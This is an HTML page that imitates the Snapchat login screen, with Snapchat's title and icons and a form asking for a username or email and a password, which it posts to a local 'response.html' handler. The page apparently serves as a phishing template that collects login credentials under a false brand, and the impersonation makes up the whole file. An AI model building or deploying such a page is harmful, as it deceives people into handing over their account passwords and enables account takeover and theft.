<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Log In | Snapchat</title>
    <link rel="icon" href="./snapchat.ico"/>
    <link rel="stylesheet" href="styles.css">
</head>
<body style="background-color: F2F2F2">
    <div class="box1" style="position: absolute; justify-content: center; left: 33%; padding: 2%; margin: 2%; background-color:white; border-radius: 2px solid whitesmoke">
    <img height="40px" width="40px" src="./snapchat-app-icon.svg"/> <br/>    <form action="response.html" method="POST">
        <label for="username"> Username or Email</label>
        <input name="username"/>
        <br/>
        <label for="password"> Password</label>
        <input name="password" type="password" />
        <br/>
        <button type="submit">Login</button>
    </form>
    </div>
</body>
</html>